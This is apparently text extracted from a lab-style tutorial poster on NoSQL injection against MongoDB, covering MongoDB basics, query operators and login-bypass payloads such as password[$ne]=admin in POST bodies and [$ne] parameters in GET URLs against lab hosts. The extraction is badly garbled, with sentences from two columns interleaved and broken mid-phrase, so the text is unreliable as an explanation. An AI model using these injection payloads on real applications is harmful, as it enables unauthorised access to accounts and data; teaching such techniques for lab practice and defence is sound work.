NoSQL injection is a web security vulnerability that allows the

attacker to have control over the database.

A NoSQL database refers to a non-relational database that is short
A NoSQL injection happens by sending queries via untrusted and
for non SQL and Not only SQL.
unfiltered web application input, which leads to leaked unauthorized
information. It is a data-storing and data-retrieving system.
Understand what NoSQL injection
the attacker can use the NoSQL injection to perform various What is NoSQL? NoSQL databases are commonly used nowadays for big Data and
operations such as modifying data, escalating privileges, DoS IoT devices due to their powerful features such as fast queries,
attacks, and others. ease of use to developers, scale easily, and flexible data structure.

db.users.find({query}) or db.users.findOne(query) Various types of NoSQL databases can be covered, including

MongoDB, Couchbase, RavenDB, etc.
functions where the query is JSON data that's send via the application:
{"username": "admin", "password":"adminpass"}. Similar to relational databases (such as MySQL and MSSQL),
query that is used in the web applications used on our login page Collections are similar to tables or views in MySQL and MSSQL.
MongoDB consists of databases, tables, fields but with different names
Note that when we provide the correct credentials, a document returns,
where Documents are similar to rows or records in MySQL and MSSQL.
while a null reply is received when providing the wrong credentials when
nothing matches! Fields are similar to columns in MySQL and MSSQL.
Using NoSQL Injection to bypass a login form
db.users.findOne({username: "admin", password: {"$ne":"xyz"}}) NoSQL Documents in MongoDB are objects stored in a format called BSON,
which supports JSON data types for document storing.
db.users.findOne({username:{"$ne":"admin"},password:{"$ne":"xyz"}}) Inject
use the same use command to create and connect to it.
username=admin&password[$ne]=admin in Request
Command
db.createCollection("users")
Once the database is created, we can create two new collections
db.getCollectionNames();
first, you need to find an entry point that doesn't sanitize the user's input.
mongo
Next, you need to understand how the web application passes the show databases
request to the database! use AoC3
Sometimes, the web app accepts the user's input via GET or POST db.users.insert({id:"1", username: "admin", email: "admin@thm.labs",
queries, and sometimes web applications accept a JSON object, as is password: "idk2021!"})
the case with APIs. Understanding NoSQL database Command2
db.users.find()
To interact with MongoDB via GET or POST is by injecting an array of Exploiting NoSQL injection MongoDB db.users.remove({'id':'2'})
the MongoDB operator to match the JSON objection to match the Key:
Value. The following is an example of how to inject via URL: db.users.drop()

http://example.thm.labs/search?username=admin&role[$ne]=user $eq - matches records that equal to a certain value

GET
http://example.thm.labs/search?username[$ne]=ben&role=user $ne - matches records that are not equal to a certain value
Injecting a NoSQL query has different forms if we deal with
We can also use the same concept to pass the MongoDB operators in
the POST requests. POST $gt - matches records that are greater than a certain value.

$where - matches records based on Javascript condition

$exists - matches records that have a certain field

MongoDB operators $regex - matches records that satisfy certain regular expressions.
$and equivalent to AND in MySQL
$or equivalent to OR in MySQL
MongoDB and MySQL $eq equivalent to = in MySQL